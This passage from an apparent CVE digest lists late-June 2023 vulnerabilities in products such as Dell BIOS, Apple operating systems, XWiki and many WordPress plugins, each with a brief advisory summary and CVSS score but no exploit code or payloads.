A remote unprivileged attacker can intercept the communication via e.g.

7.4
2023-06-23 CVE-2023-28065 Dell Link Following vulnerability in Dell Alienware Update, Command Update and Update

Dell Command | Update, Dell Update, and Alienware Update versions 4.8.0 and prior contain an Insecure Operation on Windows Junction / Mount Point vulnerability.

7.3
2023-06-20 CVE-2023-1862 Cloudflare Unspecified vulnerability in Cloudflare Warp

Cloudflare WARP client for Windows (up to v2023.3.381.0) allowed a malicious actor to remotely access the warp-svc.exe binary due to an insufficient access control policy on an IPC Named Pipe.

7.3
2023-06-24 CVE-2023-1721 Yoga Class Registration System Project Unrestricted Upload of File with Dangerous Type vulnerability in Yoga Class Registration System Project Yoga Class Registration System 1.0

Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server.

7.2
2023-06-23 CVE-2023-34254 Glpi Project OS Command Injection vulnerability in Glpi-Project Glpi Agent

The GLPI Agent is a generic management agent.

7.2
2023-06-23 CVE-2023-3393 Fossbilling Code Injection vulnerability in Fossbilling

Code Injection in GitHub repository fossbilling/fossbilling prior to 0.5.1.

7.2
2023-06-22 CVE-2023-27083 Pluck CMS Unrestricted Upload of File with Dangerous Type vulnerability in Pluck-Cms Pluck 4.7.15/4.7.16

An issue discovered in /admin.php in Pluck CMS 4.7.15 through 4.7.16-dev5 allows remote attackers to run arbitrary code via manage file functionality.

7.2
2023-06-22 CVE-2023-31867 Sage Improper Neutralization of Formula Elements in a CSV File vulnerability in Sage X3 12.14.0.500

Sage X3 version 12.14.0.50-0 is vulnerable to CSV Injection.

7.2
2023-06-21 CVE-2023-24261 GL Inet OS Command Injection vulnerability in Gl-Inet Gl-E750 Firmware

A vulnerability in GL.iNET GL-E750 Mudi before firmware v3.216 allows authenticated attackers to execute arbitrary code via a crafted POST request.

7.2
2023-06-20 CVE-2020-20491 Opencart SQL Injection vulnerability in Opencart

SQL injection vulnerability in OpenCart v.2.2.00 thru 3.0.3.2 allows a remote attacker to execute arbitrary code via the Fba plugin function in upload/admin/index.php.

7.2
2023-06-20 CVE-2020-20918 Pluck CMS Code Injection vulnerability in Pluck-Cms Pluck 4.7.10

An issue discovered in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary php code via the hidden parameter to admin.php when editing a page.

7.2
2023-06-20 CVE-2020-20919 Pluck CMS Unrestricted Upload of File with Dangerous Type vulnerability in Pluck-Cms Pluck 4.7.10

File upload vulnerability in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary code and access sensitive information via the theme.php file.

7.2
2023-06-20 CVE-2020-20969 Pluck CMS Unrestricted Upload of File with Dangerous Type vulnerability in Pluck-Cms Pluck 4.7.10

File Upload vulnerability in PluckCMS v.4.7.10 allows a remote attacker to execute arbitrary code via the trashcan_restoreitem.php file.

7.2
2023-06-20 CVE-2020-21400 Phpmywind SQL Injection vulnerability in PHPmywind 5.6

SQL injection vulnerability in gaozhifeng PHPMyWind v.5.6 allows a remote attacker to execute arbitrary code via the id variable in the modify function.

7.2
2023-06-19 CVE-2023-2221 WP Custom Cursors Project Unspecified vulnerability in WP Custom Cursors Project WP Custom Cursors

The WP Custom Cursors WordPress plugin before 3.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.

7.2
2023-06-19 CVE-2023-2492 Querywall Plug N Play Firewall Project Unspecified vulnerability in Querywall Plug'N Play Firewall Project Querywall Plug'N Play Firewall

The QueryWall: Plug'n Play Firewall WordPress plugin through 1.1.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

7.2
2023-06-19 CVE-2023-2805 Supportcandy Unspecified vulnerability in Supportcandy

The SupportCandy WordPress plugin before 3.1.7 does not properly sanitise and escape the agents[] parameter in the set_add_agent_leaves AJAX function before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

7.2
2023-06-23 CVE-2023-32357 Apple Unspecified vulnerability in Apple products

An authorization issue was addressed with improved state management.

7.1
2023-06-23 CVE-2023-32420 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

7.1
2023-06-23 CVE-2023-3317 Linux Use After Free vulnerability in Linux Kernel

A use-after-free flaw was found in mt7921_check_offload_capability in drivers/net/wireless/mediatek/mt76/mt7921/init.c in wifi mt76/mt7921 sub-component in the Linux Kernel.

7.1
2023-06-23 CVE-2023-28071 Dell Link Following vulnerability in Dell Alienware Update, Command Update and Update

Dell Command | Update, Dell Update, and Alienware Update versions 4.9.0, A01 and prior contain an Insecure Operation on Windows Junction / Mount Point vulnerability.

7.1
2023-06-22 CVE-2023-34241 Openprinting, Fedoraproject, Debian, Apple Use After Free vulnerability in multiple products

OpenPrinting CUPS is a standards-based, open source printing system for Linux and other Unix-like operating systems.

7.1
2023-06-23 CVE-2023-32413 Apple Race Condition vulnerability in Apple products

A race condition was addressed with improved state handling.

7.0

251 Medium Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-06-23 CVE-2023-25518 Nvidia Unspecified vulnerability in Nvidia Jetson Linux

NVIDIA Jetson contains a vulnerability in CBoot, where the PCIe controller is initialized without IOMMU, which may allow an attacker with physical access to the target device to read and write to arbitrary memory.

6.8
2023-06-23 CVE-2023-32480 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an Improper Input Validation vulnerability.

6.8
2023-06-21 CVE-2023-0970 Silabs Classic Buffer Overflow vulnerability in Silabs Z/Ip Gateway SDK

Multiple buffer overflow vulnerabilities in SiLabs Z/IP Gateway SDK version 7.18.01 and earlier allow an attacker with invasive physical access to a Z-Wave controller device to overwrite global memory and potentially execute arbitrary code.

6.8
2023-06-23 CVE-2023-25938 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28026 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28027 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28031 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28034 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28036 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28044 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28050 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28058 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28060 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-25937 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28028 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28029 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28030 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28032 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28033 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28035 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28039 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28040 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28041 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28042 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28052 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28054 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28056 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28059 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28061 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-25936 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-25 CVE-2023-3396 Retro Cellphone Online Store Project SQL Injection vulnerability in Retro Cellphone Online Store Project Retro Cellphone Online Store 1.0

A vulnerability was found in Campcodes Retro Cellphone Online Store 1.0.

6.5
2023-06-23 CVE-2023-35154 ENG Improper Authentication vulnerability in ENG Knowage

Knowage is an open source analytics and business intelligence suite.

6.5
2023-06-23 CVE-2023-35173 Nextcloud Unspecified vulnerability in Nextcloud End-To-End Encryption

Nextcloud End-to-end encryption app provides all the necessary APIs to implement End-to-End encryption on the client side.

6.5
2023-06-23 CVE-2023-34673 Elenos Unspecified vulnerability in Elenos Etg150 Firmware 3.12

Elenos ETG150 FM transmitter running on version 3.12 was discovered to be leaking SMTP credentials and other sensitive information by exploiting the publicly accessible Memcached service.

6.5
2023-06-23 CVE-2023-28204 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

6.5
2023-06-23 CVE-2023-32402 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

6.5
2023-06-23 CVE-2023-32423 Apple Classic Buffer Overflow vulnerability in Apple products

A buffer overflow issue was addressed with improved memory handling.

6.5
2023-06-23 CVE-2023-23344 Hcltech Incorrect Default Permissions vulnerability in Hcltech Bigfix Webui Insights 14

A permission issue in BigFix WebUI Insights site version 14 allows an authenticated, unprivileged operator to access an administrator page.

6.5
2023-06-22 CVE-2023-34462 Netty Resource Exhaustion vulnerability in Netty

Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients.

6.5
2023-06-22 CVE-2023-34553 Wafucn Authentication Bypass by Capture-replay vulnerability in Wafucn Wafu Keyless Smart Lock Firmware 1.0

An issue discovered in WAFU Keyless Smart Lock v1.0 allows attackers to unlock a device via a code replay attack.

6.5
2023-06-22 CVE-2022-47593 Rapidload SQL Injection vulnerability in Rapidload Power-Up for Autoptimize

Auth.

6.5
2023-06-22 CVE-2023-25499 Vaadin Information Exposure vulnerability in Vaadin

When adding non-visible components to the UI in server side, content is sent to the browser in Vaadin 10.0.0 through 10.0.22, 11.0.0 through 14.10.0, 15.0.0 through 22.0.28, 23.0.0 through 23.3.12, 24.0.0 through 24.0.5 and 24.1.0.alpha1 to 24.1.0.beta1, resulting in potential information disclosure.

6.5
2023-06-22 CVE-2023-34927 Casbin Cross-Site Request Forgery (CSRF) vulnerability in Casbin Casdoor

Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.

6.5
2023-06-22 CVE-2023-35093 Stylemixthemes Missing Authorization vulnerability in Stylemixthemes Masterstudy LMS

Broken Access Control vulnerability in StylemixThemes MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin <= 3.0.8 versions allows any logged-in user, such as a subscriber, to view the "Orders" of the plugin and get the data related to the order like email, username, and more.

6.5
2023-06-20 CVE-2020-20502 Yzmcms Cross-Site Request Forgery (CSRF) vulnerability in Yzmcms 2.0

Cross Site Request Forgery found in yzCMS v.2.0 allows a remote attacker to execute arbitrary code via the token check function.

6.5
2023-06-20 CVE-2023-34596 Aeotech Unspecified vulnerability in Aeotech Zw130-A Firmware 2.3

A vulnerability in Aeotec WallMote Switch firmware v2.3 allows attackers to cause a Denial of Service (DoS) via a crafted Z-Wave message.

6.5
2023-06-20 CVE-2023-34597 Fibaro Unspecified vulnerability in Fibaro Fgms-001 Firmware 3.4

A vulnerability in Fibaro Motion Sensor firmware v3.4 allows attackers to cause a Denial of Service (DoS) via a crafted Z-Wave message.

6.5
2023-06-20 CVE-2023-26428 Open Xchange Authorization Bypass Through User-Controlled Key vulnerability in Open-Xchange Appsuite Backend

Attackers can successfully request arbitrary snippet IDs, including E-Mail signatures of other users within the same context.

6.5
2023-06-19 CVE-2023-3316 Libtiff NULL Pointer Dereference vulnerability in Libtiff

A NULL pointer dereference in TIFFClose() is caused by a failure to open an output file (non-existent path or a path that requires permissions like /dev/null) while specifying zones.

6.5
2023-06-19 CVE-2023-29545 Mozilla Unspecified vulnerability in Mozilla Thunderbird

Similar to CVE-2023-28163, this time when choosing 'Save Link As', suggested filenames containing environment variable names would have resolved those in the context of the current user.

6.5
2023-06-19 CVE-2023-29546 Mozilla Unspecified vulnerability in Mozilla Firefox and Firefox Focus

When recording the screen while in Private Browsing on Firefox for Android the address bar and keyboard were not hidden, potentially leaking sensitive information.

6.5
2023-06-19 CVE-2023-32210 Mozilla Unspecified vulnerability in Mozilla Firefox

Documents were incorrectly assuming an ordering of principal objects when ensuring we were loading an appropriately privileged principal.

6.5
2023-06-19 CVE-2023-35005 Apache Unspecified vulnerability in Apache Airflow 2.6.0

In Apache Airflow, some potentially sensitive values were being shown to the user in certain situations. This vulnerability is mitigated by the fact that configuration is not shown in the UI by default (only if `[webserver] expose_config` is set to `non-sensitive-only`), and not all uncensored values are actually sensitive. This issue affects Apache Airflow: from 2.5.0 before 2.6.2.

6.5
2023-06-19 CVE-2023-35862 Libcoap Out-of-bounds Read vulnerability in Libcoap 4.3.1

libcoap 4.3.1 contains a buffer over-read via the function coap_parse_oscore_conf_mem at coap_oscore.c.

6.5
2023-06-19 CVE-2023-35840 Std42 Path Traversal vulnerability in Std42 Elfinder

_joinPath in elFinderVolumeLocalFileSystem.class.php in elFinder before 2.1.62 allows path traversal in the PHP LocalVolumeDriver connector.

6.5
2023-06-23 CVE-2023-35167 Remult Improper Access Control vulnerability in Remult

Remult is a CRUD framework for full-stack TypeScript.

6.3
2023-06-23 CVE-2023-27940 Apple Unspecified vulnerability in Apple Ipados, Iphone OS and Macos

The issue was addressed with additional permissions checks.

6.3
2023-06-23 CVE-2023-32371 Apple Unspecified vulnerability in Apple Iphone OS and Macos

The issue was addressed with improved checks.

6.3
2023-06-22 CVE-2023-35132 Moodle SQL Injection vulnerability in Moodle

A limited SQL injection risk was identified on the Mnet SSO access control page.

6.3
2023-06-25 CVE-2023-36666 Inex Cross-site Scripting vulnerability in Inex IXP Manager

INEX IXP-Manager before 6.3.1 allows XSS.

6.1
2023-06-24 CVE-2023-3388 Beautiful Cookie Banner Cross-site Scripting vulnerability in Beautiful-Cookie-Banner Beautiful Cookie Consent Banner

The Beautiful Cookie Consent Banner for WordPress is vulnerable to Stored Cross-Site Scripting via the 'nsc_bar_content_href' parameter in versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping.

6.1
2023-06-23 CVE-2023-35171 Nextcloud Open Redirect vulnerability in Nextcloud Server 26.0.0

NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform.

6.1
2023-06-23 CVE-2023-35759 Progress Cross-site Scripting vulnerability in Progress Whatsup Gold 22.1.0

In Progress WhatsUp Gold before 23.0.0, an SNMP-related application endpoint failed to adequately sanitize malicious input.

6.1
2023-06-23 CVE-2023-36346 Codekop Cross-site Scripting vulnerability in Codekop 2.0

POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.

6.1
2023-06-23 CVE-2023-35155 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35156 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35158 Xwiki Improper Neutralization of Alternate XSS Syntax vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35159 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35160 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35161 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35162 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-36287 Webkul Cross-site Scripting vulnerability in Webkul Qloapps 1.6.0

An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.

6.1
2023-06-23 CVE-2023-36289 Webkul Cross-site Scripting vulnerability in Webkul Qloapps 1.6.0

An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.

6.1
2023-06-23 CVE-2023-29100 Dream Theme Cross-site Scripting vulnerability in Dream-Theme The7

Unauth.

6.1
2023-06-23 CVE-2023-34012 Leap13 Cross-site Scripting vulnerability in Leap13 Premium Addons for Elementor

Unauth.

6.1
2023-06-23 CVE-2023-34021 Church Admin Project Cross-site Scripting vulnerability in Church Admin Project Church Admin

Unauth.

6.1
2023-06-23 CVE-2023-3381 Online School Fees System Project Cross-site Scripting vulnerability in Online School Fees System Project Online School Fees System 1.0

A vulnerability classified as problematic was found in SourceCodester Online School Fees System 1.0.

6.1
2023-06-23 CVE-2023-3382 Game Result Matrix System Project Cross-site Scripting vulnerability in Game Result Matrix System Project Game Result Matrix System 1.0

A vulnerability, which was classified as problematic, has been found in SourceCodester Game Result Matrix System 1.0.

6.1
2023-06-22 CVE-2023-28016 Hcltech Injection vulnerability in Hcltech Bigfix OSD Bare Metal Server

Host Header Injection vulnerability in the HCL BigFix OSD Bare Metal Server version 311.12 or lower allows an attacker to supply invalid input to cause the OSD Bare Metal Server to perform a redirect to an attacker-controlled domain.

6.1
2023-06-22 CVE-2023-23343 Hcltech Improper Restriction of Rendered UI Layers or Frames vulnerability in Hcltech Bigfix OSD Bare Metal Server

A clickjacking vulnerability in the HCL BigFix OSD Bare Metal Server version 311.12 or lower allows an attacker to use transparent or opaque layers to trick a user into clicking on a button or link on another page to perform a redirect to an attacker-controlled domain.

6.1
2023-06-22 CVE-2023-35131 Moodle Cross-site Scripting vulnerability in Moodle

Content on the groups page required additional sanitizing to prevent an XSS risk.

6.1
2023-06-22 CVE-2023-28799 Zscaler Open Redirect vulnerability in Zscaler Client Connector

A URL parameter during login flow was vulnerable to injection.

6.1
2023-06-22 CVE-2023-28800 Zscaler Cross-site Scripting vulnerability in Zscaler Client Connector

When using local accounts for administration, the redirect url parameter was not encoded correctly, allowing for an XSS attack providing admin login.

6.1
2023-06-22 CVE-2023-34796 Techsneeze Cross-site Scripting vulnerability in Techsneeze Dmarc Report 1.1

Cross site scripting (XSS) vulnerability in dmarcts-report-viewer dashboard versions 1.1 and through commit 8a1d882b4c481a05e296e9b38a7961e912146a0f allows unauthenticated attackers to execute arbitrary code via the org_name or domain values.

6.1
2023-06-22 CVE-2023-32960 Updraftplus Cross-Site Request Forgery (CSRF) vulnerability in Updraftplus

Cross-Site Request Forgery (CSRF) vulnerability in UpdraftPlus.Com, DavidAnderson UpdraftPlus WordPress Backup Plugin <= 1.23.3 versions leads to sitewide Cross-Site Scripting (XSS).

6.1
2023-06-22 CVE-2023-33997 BBP Style Pack Project Cross-site Scripting vulnerability in BBP Style Pack Project BBP Style Pack

Unauth.

6.1
2023-06-22 CVE-2023-28750 Albo Pretorio ON Line Project Cross-site Scripting vulnerability in Albo Pretorio on Line Project Albo Pretorio on Line

Unauth.

6.1
2023-06-22 CVE-2023-28776 I13Websolution Cross-site Scripting vulnerability in I13Websolution Continuous Image Carousel With Lightbox

Unauth.

6.1
2023-06-22 CVE-2023-28784 Contest Gallery Cross-site Scripting vulnerability in Contest-Gallery Contest Gallery

Unauth.

6.1
2023-06-22 CVE-2023-30500 Wpforms Cross-site Scripting vulnerability in Wpforms Contact Form and Wpforms

Unauth.

6.1
2023-06-22 CVE-2023-35918 Woocommerce Cross-site Scripting vulnerability in Woocommerce Bulk Stock Management

Unauth.

6.1
2023-06-22 CVE-2023-33387 Datev Cross-site Scripting vulnerability in Datev EG Personal-Management System Comfort/Comfort Plus 16.1.1

A reflected cross-site scripting (XSS) vulnerability in DATEV eG Personal-Management System Comfort/Comfort Plus v15.1.0 to v16.1.1 P4 allows attackers to steal targeted users' login data by sending a crafted link.

6.1
2023-06-22 CVE-2023-28166 Tags Cloud Manager Project Cross-site Scripting vulnerability in Tags Cloud Manager Project Tags Cloud Manager

Unauth.

6.1
2023-06-22 CVE-2019-25152 Tychesoftwares Unspecified vulnerability in Tychesoftwares products

The Abandoned Cart Lite for WooCommerce and Abandoned Cart Pro for WooCommerce plugins for WordPress are vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 5.1.3 and 7.12.0 respectively, due to insufficient input sanitization and output escaping.

6.1
2023-06-21 CVE-2023-33405 Blogengine Open Redirect vulnerability in Blogengine Blogengine.Net

Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect.

6.1
2023-06-21 CVE-2023-33591 User Registration Login AND User Management System Project Cross-site Scripting vulnerability in User Registration & Login and User Management System Project User Registration & Login and User Management System 1.0

User Registration & Login and User Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/search-result.php.

6.1
2023-06-21 CVE-2023-33725 Broadleafcommerce Cross-site Scripting vulnerability in Broadleafcommerce Broadleaf Commerce

Broadleaf 5.x and 6.x (including 5.2.25-GA and 6.2.6-GA) was discovered to contain a cross-site scripting (XSS) vulnerability via a customer signup with a crafted email address.

6.1
2023-06-21 CVE-2023-27414 AYS PRO Cross-site Scripting vulnerability in Ays-Pro Popup BOX

Unauth.

6.1
2023-06-21 CVE-2023-27432 Manage Upload Limit Project Cross-site Scripting vulnerability in Manage Upload Limit Project Manage Upload Limit

Unauth.

6.1
2023-06-21 CVE-2023-27450 TE ST Cross-site Scripting vulnerability in Te-St Leyka

Unauth.

6.1
2023-06-20 CVE-2020-20070 Diaowen Cross-site Scripting vulnerability in Diaowen Dwsurvey 1.0

Cross Site Scripting vulnerability found in wkeyuan DWSurvey 1.0 allows a remote attacker to execute arbitrary code via thequltemld parameter of the qu-multi-fillblank!answers.action file.

6.1
2023-06-20 CVE-2020-20725 Taogogo Cross-site Scripting vulnerability in Taogogo Taocms 2.5

Cross Site Scripting vulnerability in taogogo taoCMS v.2.5 beta5.1 allows a remote attacker to execute arbitrary code via the name field in admin.php.

6.1
2023-06-20 CVE-2020-21052 Zrlog Cross-site Scripting vulnerability in Zrlog 2.1.3

Cross Site Scripting vulnerability in zrlog zrlog v.2.1.3 allows a remote attacker to execute arbitrary code via the nickame parameter of the /post/addComment function.

6.1
2023-06-20 CVE-2020-21058 Typora Cross-site Scripting vulnerability in Typora 0.9.79

Cross Site Scripting vulnerability in Typora v.0.9.79 allows a remote attacker to execute arbitrary code via the mermaid syntax.

6.1
2023-06-20 CVE-2020-21268 Easycorp Cross-site Scripting vulnerability in Easycorp Zentao 11.6.4

Cross Site Scripting vulnerability in EasySoft ZenTao v.11.6.4 allows a remote attacker to execute arbitrary code via the lastComment parameter.

6.1
2023-06-20 CVE-2020-21485 Alluxio Cross-site Scripting vulnerability in Alluxio 1.8.1

Cross Site Scripting vulnerability in Alluxio v.1.8.1 allows a remote attacker to execute arbitrary code via the path parameter in the browse board component.

6.1
2023-06-20 CVE-2023-33495 Craftcms Cross-site Scripting vulnerability in Craftcms Craft CMS

Craft CMS through 4.4.9 is vulnerable to HTML Injection.

6.1
2023-06-20 CVE-2023-35097 Dojo Cross-site Scripting vulnerability in Dojo WP Affiliate Links

Unauth.

6.1
2023-06-20 CVE-2023-35098 Wordpress Nextgen Galleryview Project Cross-site Scripting vulnerability in Wordpress Nextgen Galleryview Project Wordpress Nextgen Galleryview

Unauth.

6.1
2023-06-20 CVE-2023-35884 Metagauss Cross-site Scripting vulnerability in Metagauss Eventprime

Unauth.

6.1
2023-06-19 CVE-2023-32659 Subnet Cross-site Scripting vulnerability in Subnet Powersystem Center 2020

SUBNET PowerSYSTEM Center versions 2020 U10 and prior contain a cross-site scripting vulnerability that may allow an attacker to inject malicious code into report header graphic files that could propagate out of the system and reach users who are subscribed to email notifications.

6.1
2023-06-19 CVE-2023-35772 Google MAP Shortcode Project Cross-site Scripting vulnerability in Google MAP Shortcode Project Google MAP Shortcode

Unauth.

6.1
2023-06-19 CVE-2023-35775 WP Backup Solutions Project Cross-site Scripting vulnerability in WP Backup Solutions Project WP Backup Solutions

Unauth.

6.1
2023-06-19 CVE-2023-2399 Qudata Unspecified vulnerability in Qudata Qubot

The QuBot WordPress plugin before 1.1.6 doesn't filter user input on chat, leading to bad code inserted on it be reflected on the user dashboard.

6.1
2023-06-19 CVE-2023-2654 Themify Unspecified vulnerability in Themify Conditional Menus

The Conditional Menus WordPress plugin before 1.2.1 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

6.1
2023-06-19 CVE-2023-2779 Heator Unspecified vulnerability in Heator Social Share, Social Login and Social Comments

The Social Share, Social Login and Social Comments WordPress plugin before 7.13.52 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

6.1
2023-06-19 CVE-2023-34415 Mozilla Open Redirect vulnerability in Mozilla Firefox

When choosing a site-isolated process for a document loaded from a data: URL that was the result of a redirect, Firefox would load that document in the same process as the site that issued the redirect.

6.1
2023-06-23 CVE-2023-32369 Apple Unspecified vulnerability in Apple Macos

A logic issue was addressed with improved state management.

6.0
2023-06-25 CVE-2015-20109 GNU Classic Buffer Overflow vulnerability in GNU Glibc

end_pattern (called from internal_fnmatch) in the GNU C Library (aka glibc or libc6) before 2.22 might allow context-dependent attackers to cause a denial of service (application crash), as demonstrated by use of the fnmatch library function with the **(!() pattern.

5.5
2023-06-23 CVE-2022-42792 Apple Unspecified vulnerability in Apple Ipados and Iphone OS

This issue was addressed with improved data protection.

5.5
2023-06-23 CVE-2022-42860 Apple Unspecified vulnerability in Apple Macos

This issue was addressed with improved checks to prevent unauthorized actions.

5.5
2023-06-23 CVE-2022-46715 Apple Unspecified vulnerability in Apple Ipados and Iphone OS

A logic issue was addressed with improved checks.

5.5
2023-06-23 CVE-2022-46718 Apple Unspecified vulnerability in Apple Ipados and Macos

A logic issue was addressed with improved restrictions.

5.5
2023-06-23 CVE-2023-25520 Nvidia Improper Input Validation vulnerability in Nvidia Jetson Linux

NVIDIA Jetson Linux Driver Package contains a vulnerability in nvbootctrl, where a privileged local attacker can configure invalid settings, resulting in denial of service.

5.5
2023-06-23 CVE-2023-28191 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved redaction of sensitive information.

5.5
2023-06-23 CVE-2023-28202 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved state management.

5.5
2023-06-23 CVE-2023-32352 Apple Unspecified vulnerability in Apple products

A logic issue was addressed with improved checks.

5.5
2023-06-23 CVE-2023-32354 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32355 Apple Unspecified vulnerability in Apple Macos

A logic issue was addressed with improved state management.

5.5
2023-06-23 CVE-2023-32360 Apple Unspecified vulnerability in Apple Macos

An authentication issue was addressed with improved state management.

5.5
2023-06-23 CVE-2023-32363 Apple Unspecified vulnerability in Apple Macos

A permissions issue was addressed by removing vulnerable code and adding additional checks.

5.5
2023-06-23 CVE-2023-32367 Apple Unspecified vulnerability in Apple Iphone OS and Macos

This issue was addressed with improved entitlements.

5.5
2023-06-23 CVE-2023-32368 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32372 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32375 Apple Out-of-bounds Read vulnerability in Apple Macos

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32376 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved entitlements.

5.5
2023-06-23 CVE-2023-32382 Apple Out-of-bounds Read vulnerability in Apple Macos

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32385 Apple Unspecified vulnerability in Apple Macos

A denial-of-service issue was addressed with improved memory handling.

5.5
2023-06-23 CVE-2023-32388 Apple Unspecified vulnerability in Apple products

A privacy issue was addressed with improved private data redaction for log entries.

5.5
2023-06-23 CVE-2023-32389 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved redaction of sensitive information.

5.5
2023-06-23 CVE-2023-32392 Apple Information Exposure Through Log Files vulnerability in Apple products

